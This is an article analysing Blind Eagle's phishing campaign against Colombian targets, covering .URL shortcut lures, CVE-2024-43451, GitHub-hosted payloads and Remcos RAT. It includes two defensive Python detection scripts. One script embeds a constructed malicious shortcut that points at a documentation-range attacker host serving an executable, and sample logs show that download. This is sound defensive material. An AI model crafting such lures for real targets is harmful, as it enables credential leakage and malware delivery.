A cyber threat group known as Blind Eagle, also tracked under aliases like APT-C-36, AguilaCiega, and APT-Q-98, is actively targeting Colombian government and private organizations. These attacks, running since November 2024, rely on familiar social engineering tactics but with some dangerous new twists—including the use of GitHub-hosted malware, a now-patched NTLM vulnerability, and custom encryption tools.
Researchers at Check Point who analyzed the campaign reported more than 1,600 confirmed victims in just one wave of attacks launched in mid-December 2024. That’s a high hit rate for an advanced persistent threat (APT) that typically favors focused, targeted operations.
Why This Campaign Is So Alarming
Precision Targeting with a Broad Reach
Blind Eagle is known for targeting a narrow set of countries, above all Colombia and at times Ecuador. Its phishing emails are written in Spanish and impersonate local government agencies and institutions, which makes them far more believable than generic lures.
In this campaign the group compromised judicial entities and government networks with emails carrying malicious .URL (Internet Shortcut) files. Opening the shortcut starts a multi-stage download that typically ends with the installation of a remote access tool such as Remcos RAT.
Fast Exploitation of CVE-2024-43451
One of the most worrying aspects is how quickly Blind Eagle weaponized CVE-2024-43451, a Windows flaw that let a crafted file disclose a user's NTLMv2 hash (the challenge-response value Windows sends during authentication, which an attacker can crack offline or relay). Microsoft patched it in the November 2024 updates; Check Point found a variant of the technique in Blind Eagle's campaign just six days later.
The trick? Send users a malicious shortcut file. On unpatched systems, even minimal interaction with the file, such as right-clicking, dragging or deleting it, makes Windows issue a WebDAV request to the attacker's server. In this campaign that request serves mainly as a beacon confirming that the lure reached a live user; on an unpatched host the same exchange is what could leak NTLM authentication material.
Even on patched systems, a user who opens the file still triggers the download and execution of the next stage. The patch closes the hash leak, not the delivery path, so user behavior remains the decisive link.
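The mechanics behind that shortcut can be checked statically before a user ever sees it. What follows is an added example written for this article, not Check Point's tooling or anything recovered from the campaign: a small Python triage script that parses the INI structure of a .URL file and flags the properties that make one dangerous, namely a file:// or UNC target on a remote host (which Windows resolves over SMB or WebDAV and authenticates to with NTLM), the WebClient "@80"/"@SSL" port syntax that forces WebDAV, a remote IconFile (fetched as soon as Explorer draws the icon, before any click), and a target with an executable extension. The rule names and both sample shortcuts are constructed for the example, and the attacker address is taken from the documentation range.

```python
"""Static triage of Windows Internet Shortcut (.URL) files.

Added example (not Check Point's or Blind Eagle's code). A .URL file is a
small INI file with an [InternetShortcut] section. When its URL or IconFile
value names a remote host via the file:// scheme or a UNC path, Windows
resolves it through the SMB or WebDAV redirector and sends NTLM
authentication on the way; that request is what tells the attacker the lure
reached a live user. The rules below are heuristics written for this
example, and the sample shortcuts at the bottom are constructed.
"""
import configparser
import re
from urllib.parse import unquote, urlsplit

# Extensions Windows will run rather than display.
EXECUTABLE_EXT = {".exe", ".scr", ".dll", ".hta", ".js", ".jse", ".vbs", ".vbe",
                  ".bat", ".cmd", ".ps1", ".msi", ".lnk"}
LOCAL_HOSTS = {"", "localhost", "127.0.0.1", "::1"}
_EXT_RE = re.compile(r"(\.[A-Za-z0-9]{1,4})$")


def parse_url_file(text: str) -> dict:
    """Return the [InternetShortcut] keys (lower-cased) or {} if the file is not a shortcut."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text.lstrip("\ufeff"))       # tolerate a UTF-8 BOM
    except configparser.Error:                       # garbage or no section header
        return {}
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return {k.lower(): v.strip().strip('"') for k, v in cp.items(section)}
    return {}


def classify_target(value: str) -> dict:
    """Break a URL or UNC string into scheme, host, path extension and whether it
    uses the WebClient '@port' syntax (host@80, host@SSL@443) that forces WebDAV."""
    if value.startswith("\\\\"):                     # UNC: \\host\share\file
        body = value[2:].replace("\\", "/")
        netloc, _, path = body.partition("/")
        scheme = "unc"
        host, _, port_part = netloc.partition("@")
    else:
        parts = urlsplit(value)
        scheme, path = parts.scheme.lower(), unquote(parts.path)
        if scheme == "file":                         # file://host@80/share/x
            host, _, port_part = parts.netloc.partition("@")
        else:                                        # http(s) and anything else
            host, port_part = parts.hostname or "", ""
    m = _EXT_RE.search(path.rstrip("/"))
    return {"scheme": scheme, "host": host.lower(), "webdav": bool(port_part),
            "ext": m.group(1).lower() if m else ""}


def triage_url_file(text: str) -> list:
    """Return (rule, detail) findings for one .URL file; an empty list means nothing matched."""
    shortcut = parse_url_file(text)
    findings = []
    for key in ("url", "iconfile"):
        if key not in shortcut:
            continue
        t = classify_target(shortcut[key])
        remote = t["host"] not in LOCAL_HOSTS
        share = t["scheme"] in ("file", "unc") and remote
        if share:
            findings.append(("remote-share",
                             f"{key} resolves over SMB/WebDAV to {t['host']} (NTLM authentication is sent)"))
        if t["webdav"]:
            findings.append(("webdav-port-syntax",
                             f"{key} uses the WebClient '@port' form, forcing WebDAV to {t['host']}"))
        if key == "iconfile" and share:
            findings.append(("remote-icon",
                             "icon is fetched when Explorer renders the shortcut; no click is needed"))
        if remote and t["ext"] in EXECUTABLE_EXT:
            findings.append(("executable-target",
                             f"{key} points at a {t['ext']} file on {t['host']}"))
    return findings


# Constructed samples (not real campaign artifacts): one lure in the style
# described in the article, one ordinary bookmark.
LURE = ("\ufeff[InternetShortcut]\r\n"
        "URL=file://203.0.113.10@80/share/Actualizacion.exe\r\n"
        "IconFile=\\\\203.0.113.10@80\\share\\doc.ico\r\n"
        "IconIndex=1\r\n")
BOOKMARK = "[InternetShortcut]\nURL=https://www.example.com/docs/guide.html\n"

if __name__ == "__main__":
    for name, sample in (("lure", LURE), ("bookmark", BOOKMARK)):
        hits = triage_url_file(sample)
        print(f"{name}: {len(hits)} finding(s)")
        for rule, detail in hits:
            print(f"  [{rule}] {detail}")
```

Run it over a mail-gateway quarantine or a directory of attachments and treat any `remote-share` or `remote-icon` hit as block-worthy: a legitimate bookmark has no reason to point Explorer at a share on the internet. The script deliberately ignores http(s) targets unless they end in an executable extension, so it will not flag ordinary web links.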
From Phishing to Remote Control: The Full Infection Chain
Email > .URL File > NTLM Ping > RAT Payload
The attack begins with a phishing email carrying a malicious link or .URL attachment. Interacting with it triggers, in order:
- A WebDAV request to an attacker-controlled server that signals the user interacted with the file
- Download of the next-stage executable, packed with a service called HeartCrypt
- Execution of that payload, a custom-packed variant of the PureCrypter loader
- Final deployment of a RAT such as Remcos, AsyncRAT, NjRAT or Quasar RAT
Each of these tools allows remote access and control, giving attackers persistent entry into the victim’s system.
GitHub and Bitbucket as Malware Distribution Hubs
Using Trusted Platforms to Hide in Plain Sight
Instead of shady, easily blocklisted domains, Blind Eagle hosts its payloads on GitHub and Bitbucket, platforms normally associated with developers and open-source software.
Because these services are allow-listed almost everywhere, the downloads pass most corporate web filters, and a file served from a reputable domain over TLS is hard for automated tools to separate from legitimate developer traffic.
Security researchers noted that the malware files sat in public repositories, sometimes camouflaged under legitimate-looking names.
New Tools and Services: HeartCrypt and PureCrypter
Borrowing from the Cybercrime Marketplace
Blind Eagle has now adopted HeartCrypt, a packer-as-a-service (PaaS). A packer wraps a malicious executable in an encrypted layer that is only decrypted at run time, so the static signatures antivirus and endpoint tools rely on do not match the file on disk. Here HeartCrypt wrapped a build of PureCrypter, a loader that in turn drops Remcos RAT, a commercial remote access tool long abused by cybercrime groups.
Using services like HeartCrypt shows how Blind Eagle is deeply connected to the broader cybercriminal economy, leveraging paid tools to improve their stealth.
GitHub Error Reveals Stolen Passwords and Victim Data
A Mistake Exposes the Attacker’s Backend
In a rare operational slip, researchers found a GitHub repository tied to Blind Eagle containing an HTML file, Ver Datos del Formulario.html, that listed login credentials for over 1,600 users, including:
- Usernames
- Passwords
- Email addresses
- ATM PINs
- Government agency accounts
- Business and school emails
Although the file was removed on February 25, 2025, it had already exposed a large cache of personal and institutional data.
This confirmed that Blind Eagle harvests credentials as well as deploying RATs, and it revealed the group's operating time zone, UTC-5, which lines up with Colombia and neighbouring countries.
Why This Campaign Is So Effective
Trust, Timing, and Targeting
Blind Eagle’s success stems from a combination of factors:
- Highly targeted phishing emails that mimic real government or judicial communication
- Rapid weaponization of newly disclosed vulnerabilities
- Use of trusted file-sharing and code-hosting services (e.g., Google Drive, Dropbox, GitHub, Bitbucket)
- Remote access tools that are easy to customize and hard to detect
Their operations are marked by speed and stealth, and their adoption of PaaS tools like HeartCrypt suggests they are scaling operations with professional-level resources.
What Makes Remcos RAT So Dangerous?
One Tool, Many Capabilities
The Remote Control & Surveillance (Remcos) RAT allows attackers to:
- Log keystrokes
- Record webcam and audio feeds
- Capture screenshots
- Download or delete files
- Control the mouse and keyboard
- Steal saved browser credentials
This level of control gives attackers full visibility into a victim's activity and a foothold from which to harvest credentials and move laterally across the network.
How to Defend Against These Attacks
Actionable Tips for Organizations and Individuals
- Patch Windows systems immediately, starting with the November 2024 update for CVE-2024-43451
- Block outbound SMB (TCP 445) and WebDAV to the internet at the perimeter, and disable the WebClient service on endpoints that do not need it
- Block or quarantine .URL (and other shortcut) attachments at the email gateway; they have no legitimate reason to arrive by mail
- Use behavior-based detection, not just signature-based AV, since packers such as HeartCrypt exist precisely to defeat signatures
- Watch for unexpected downloads of executables from GitHub and Bitbucket, especially by hosts that are not developer workstations
- Educate staff on phishing that mimics legal or government correspondence
- Segment networks to limit lateral movement once a host is compromised
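The WebDAV and code-hosting bullets above are easier to act on once you know what that traffic looks like in your own logs. The following added example (written for this article; it is not a vendor detection and not Check Point's) hunts an egress HTTP log for the two things the lure chain produces: the Windows WebClient service talking to a non-corporate host, and executable downloads from GitHub or Bitbucket. It assumes a space-separated log with the fields `<timestamp> <client-ip> <method> <url> <status> "<user-agent>"` (constructed here; adapt `LOG_RE` to your proxy or firewall export), an internal address plan of the RFC 1918 ranges plus one assumed corporate DNS suffix, and the fact that WebClient identifies itself with the `Microsoft-WebDAV-MiniRedir` user agent. The sample log lines are constructed and use documentation addresses.

```python
"""Hunt egress HTTP logs for WebClient (WebDAV) beacons and code-host binary
downloads of the kind the .URL lures generate.

Added example, not a vendor detection. Assumed: the log format matched by
LOG_RE, the internal ranges/suffix below, and the Microsoft-WebDAV-MiniRedir
user agent of the Windows WebClient service. All sample lines are constructed.
"""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
                    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$')
# Explicit site ranges rather than ipaddress.is_private, which also treats the
# documentation ranges used in the samples as non-global.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
INTERNAL_SUFFIXES = (".corp.example",)            # assumed corporate DNS suffix
# OPTIONS is left out: browsers send it for CORS preflight, so it is too noisy.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "MOVE", "COPY", "LOCK", "UNLOCK"}
CODE_HOSTS = {"github.com", "raw.githubusercontent.com", "objects.githubusercontent.com",
              "bitbucket.org", "api.bitbucket.org"}
BINARY_EXT = {".exe", ".dll", ".scr", ".bin", ".zip", ".rar", ".7z", ".iso", ".hta", ".vbs", ".js", ".ps1"}


def is_internal(host: str) -> bool:
    """True for addresses in INTERNAL_NETS and names under the corporate suffix."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower().endswith(INTERNAL_SUFFIXES)
    return any(ip in net for net in INTERNAL_NETS)


def classify(record: dict):
    """Return (rule, host) for one parsed log record, or None if it is unremarkable."""
    parts = urlsplit(record["url"])
    host = (parts.hostname or "").lower()
    if not host or is_internal(host):
        return None
    if record["ua"].startswith("Microsoft-WebDAV-MiniRedir"):
        return "webclient-external-share", host       # WebClient reached a non-corporate host
    if record["method"] in WEBDAV_METHODS:
        return "webdav-method-external", host         # WebDAV verbs even if the UA was rewritten
    if host in CODE_HOSTS and any(parts.path.lower().endswith(e) for e in BINARY_EXT):
        return "code-host-binary-download", host      # audit-grade: noisy in dev shops, rare elsewhere
    return None


def detect(lines) -> list:
    """Parse lines and return findings as dicts; unparsable lines are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        hit = classify(rec)
        if hit:
            rule, host = hit
            findings.append({"rule": rule, "client": rec["client"], "host": host, "ts": rec["ts"]})
    return findings


def summarize(findings) -> dict:
    """Map each internal client to the set of external hosts it was flagged against."""
    by_client = defaultdict(set)
    for f in findings:
        by_client[f["client"]].add(f["host"])
    return dict(by_client)


# Constructed egress log: one client walking the lure chain, one legitimate
# internal WebDAV user, one GitHub binary fetch, one ordinary page view.
SAMPLE_LOG = """\
2024-12-19T14:02:11Z 10.20.1.57 OPTIONS http://203.0.113.10/share/ 200 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2024-12-19T14:02:11Z 10.20.1.57 PROPFIND http://203.0.113.10/share/ 207 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2024-12-19T14:02:13Z 10.20.1.57 GET http://203.0.113.10/share/Actualizacion.exe 200 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2024-12-19T14:05:40Z 10.20.1.88 PROPFIND http://files.corp.example/dav/ 207 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2024-12-19T14:06:02Z 10.20.1.91 GET https://github.com/someuser/repo/raw/main/update.bin 200 "Mozilla/5.0"
2024-12-19T14:07:30Z 10.20.1.57 GET https://www.example.com/ 200 "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ts']} {f['client']} -> {f['host']} [{f['rule']}]")
    print(summarize(hits))
```

Run it over a real export before you enforce the "block outbound WebDAV" bullet: the `webclient-external-share` hits tell you which internal clients already depend on WebClient (SharePoint's "Open with Explorer" uses it, for instance), so you can allow-list those destinations and then block everything else at the perimeter. The `code-host-binary-download` rule is intentionally low-severity; on developer subnets it will fire constantly, on a court clerk's workstation it should never fire.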
FAQs
Who is Blind Eagle?
Blind Eagle is a threat group active since 2018, focused mainly on targeting Colombian and Ecuadorian organizations through phishing and remote access tools.
What is CVE-2024-43451?
It is a Microsoft Windows vulnerability that let a crafted file disclose the user's NTLMv2 hash. Microsoft patched it in November 2024, but a user who opens one of the malicious .URL files still starts the download chain even on a patched system.
How does GitHub play into this campaign?
Blind Eagle hosted malware files on public GitHub repositories to bypass filters and deliver payloads discreetly.
What is HeartCrypt?
A Packer-as-a-Service tool used to encrypt malware files and bypass antivirus detection, often paired with PureCrypter or other loaders.
What kind of data was exposed by the attackers?
Credentials from over 1,600 victims, including government workers, educational staff, and private users in Colombia.
How can I protect my system from such attacks?
Regularly patch software, train users to spot phishing emails, and use advanced endpoint protection that monitors behavior, not just file names.